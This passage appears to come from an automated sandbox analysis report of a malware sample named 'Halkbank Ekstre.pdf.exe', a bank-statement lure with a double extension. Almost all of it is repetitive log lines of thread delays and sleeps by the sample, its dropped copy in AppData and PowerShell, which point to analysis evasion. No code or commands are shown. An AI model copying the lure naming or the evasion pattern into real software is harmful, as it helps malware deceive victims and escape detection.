                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599655
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599422
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599296
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599187
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599076
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598953
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598843
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598733
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598624
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598489
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598287
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597577
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597358
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597249
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597031
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596921
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596812
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596702
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596590
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596355
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596124
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595796
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595687
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595578
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595359
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595249
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 595031
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594921
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594812
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594702
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594593
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594478
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594374
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 594265
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7561Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2086Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7549Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2092Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeWindow / User API: threadDelayed 3046Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeWindow / User API: threadDelayed 6790Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeWindow / User API: threadDelayed 1982
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeWindow / User API: threadDelayed 7873
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1524Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 400Thread sleep count: 3046 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 400Thread sleep count: 6790 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -599670s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -599451s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598989s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598311s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598201s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -598093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -597109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -596992s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -596890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -596337s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -596184s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -595015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594905s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -594031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -593921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -593812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -593703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -593593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe TID: 2788Thread sleep time: -593484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 3108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1212Thread sleep count: 1982 > 30
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1212Thread sleep count: 7873 > 30
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599655s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599296s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -599076s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598843s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598733s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598624s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598489s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598287s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -598015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597796s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597577s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597358s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597249s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596921s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596702s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596590s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596355s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596124s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -596015s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595796s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595687s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595468s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595359s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595249s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595140s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -595031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594921s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594812s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594702s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594593s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594478s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594374s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe TID: 1016Thread sleep time: -594265s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599670Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 599451Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598989Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598749Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598311Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598201Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596992Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596337Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 596184Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595999Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595890Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595781Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595671Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594905Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594796Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594687Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594468Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594249Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594140Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593921Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593812Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593593Jump to behavior
                    Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exeThread delayed: delay time: 593484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599874
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599655
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599422
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599296
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599187
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 599076
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598953
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598843
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598733
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598624
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598489
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598287
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598140
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 598015
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597906
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597796
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597577
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597468
                    Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exeThread delayed: delay time: 597358
